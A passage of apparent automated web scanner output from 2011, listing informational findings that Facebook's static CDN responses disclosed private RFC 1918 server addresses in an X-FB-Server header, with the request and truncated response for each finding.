10.138.69.186

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df236de4684%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f13fbd2c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.69.186
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=757
Expires: Thu, 16 Jun 2011 12:58:54 GMT
Date: Thu, 16 Jun 2011 12:46:17 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.361. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.186

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3f9538728%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff399bdf3c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.64.186
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=800
Expires: Thu, 16 Jun 2011 12:07:51 GMT
Date: Thu, 16 Jun 2011 11:54:31 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.362. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.185

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa8396448%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1ed556998%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.16.185
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=631
Expires: Thu, 16 Jun 2011 13:27:48 GMT
Date: Thu, 16 Jun 2011 13:17:17 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.363. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.198

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb4cb576c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25c0fb1fc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.146.198
X-Cnection: close
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=623
Expires: Thu, 16 Jun 2011 16:49:07 GMT
Date: Thu, 16 Jun 2011 16:38:44 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.364. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.184

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df282086768%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff36caf868c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.17.184
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=208
Expires: Thu, 16 Jun 2011 18:30:54 GMT
Date: Thu, 16 Jun 2011 18:27:26 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.365. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.183

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a803aa8%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1e06a7d9c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424052702303714704576384051388321740.html%3Fmod%3DWSJ_hp_mostpop_read&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.69.183
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=812
Expires: Thu, 16 Jun 2011 11:36:12 GMT
Date: Thu, 16 Jun 2011 11:22:40 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.366. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.184

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df388f60e9%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffe69f3b88%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.69.184
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=1355
Expires: Thu, 16 Jun 2011 18:24:07 GMT
Date: Thu, 16 Jun 2011 18:01:32 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.367. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.182

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df343fad964%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffac3ba548%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.16.182
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=1180
Expires: Thu, 16 Jun 2011 17:29:28 GMT
Date: Thu, 16 Jun 2011 17:09:48 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.368. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.181

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2397668d8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa9a1e43%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.16.181
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=1140
Expires: Thu, 16 Jun 2011 15:40:12 GMT
Date: Thu, 16 Jun 2011 15:21:12 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.369. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.182

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17499c92c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff96bb174%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.69.182
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=1396
Expires: Thu, 16 Jun 2011 15:13:29 GMT
Date: Thu, 16 Jun 2011 14:50:13 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.370. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.183

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2cde5d9a4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b1d388a%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.16.183
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=238
Expires: Thu, 16 Jun 2011 15:20:00 GMT
Date: Thu, 16 Jun 2011 15:16:02 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.371. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.199

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df398326d08%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffef219d14%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.145.199
X-Cnection: close
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=237
Expires: Thu, 16 Jun 2011 13:05:38 GMT
Date: Thu, 16 Jun 2011 13:01:41 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.372. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.191

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df163c489c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff7024fb3%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.148.191
X-Cnection: close
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=1424
Expires: Thu, 16 Jun 2011 12:33:43 GMT
Date: Thu, 16 Jun 2011 12:09:59 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.373. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/5YkCKQk_Uwd.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y5/r/5YkCKQk_Uwd.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.194

Request

GET /rsrc.php/v1/y5/r/5YkCKQk_Uwd.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27bfac8d%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Fvideo%2Fhow-to-include-your-pet-in-your-wedding-party%2F8DE80DF5-6EA8-4B36-B310-BCA4427CCA14.html&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 15 Jun 2011 20:26:56 GMT
X-FB-Server: 10.30.147.194
X-Cnection: close
Content-Length: 25755
Vary: Accept-Encoding
Cache-Control: public, max-age=31485137
Expires: Thu, 14 Jun 2012 21:14:49 GMT
Date: Thu, 16 Jun 2011 11:22:32 GMT
Connection: close

/*1308172516,169776066*/

if (window.CavalryLogger) { CavalryLogger.start_js(["evTQd"]); }

function object(b){var a=new Function();a.prototype=b;return new a();}function is_scalar(a){return (/string|
...[SNIP]...

19.374. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/H7He8TCHOS8.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yF/r/H7He8TCHOS8.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.193

Request

GET /rsrc.php/v1/yF/r/H7He8TCHOS8.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27bfac8d%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Fvideo%2Fhow-to-include-your-pet-in-your-wedding-party%2F8DE80DF5-6EA8-4B36-B310-BCA4427CCA14.html&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Fri, 10 Jun 2011 02:26:22 GMT
X-FB-Server: 10.30.147.193
X-Cnection: close
Content-Length: 68082
Vary: Accept-Encoding
Cache-Control: public, max-age=31287095
Expires: Tue, 12 Jun 2012 14:14:07 GMT
Date: Thu, 16 Jun 2011 11:22:32 GMT
Connection: close

/*1307974440,169776065*/

if (window.CavalryLogger) { CavalryLogger.start_js(["JYXUq"]); }

!function(){function a(b){return function(){if(this===window)throw new TypeError();return b.apply(this,argum
...[SNIP]...

19.375. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/WzO4x8ghoO7.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yG/r/WzO4x8ghoO7.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.193

Request

GET /rsrc.php/v1/yG/r/WzO4x8ghoO7.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27bfac8d%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Fvideo%2Fhow-to-include-your-pet-in-your-wedding-party%2F8DE80DF5-6EA8-4B36-B310-BCA4427CCA14.html&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 09 Jun 2011 01:07:24 GMT
X-FB-Server: 10.30.148.193
X-Cnection: close
Content-Length: 54939
Vary: Accept-Encoding
Cache-Control: public, max-age=31378026
Expires: Wed, 13 Jun 2012 15:29:38 GMT
Date: Thu, 16 Jun 2011 11:22:32 GMT
Connection: close

/*1308065388,169776321*/

if (window.CavalryLogger) { CavalryLogger.start_js(["qEipN"]); }

WindowComm={_callbacks:{},makeHandler:function(a,c){c=c||'opener';var b='f'+(Math.random()*(1<<30)).toString
...[SNIP]...

19.376. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/WzO4x8ghoO7.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yG/r/WzO4x8ghoO7.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.183

Request

GET /rsrc.php/v1/yG/r/WzO4x8ghoO7.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
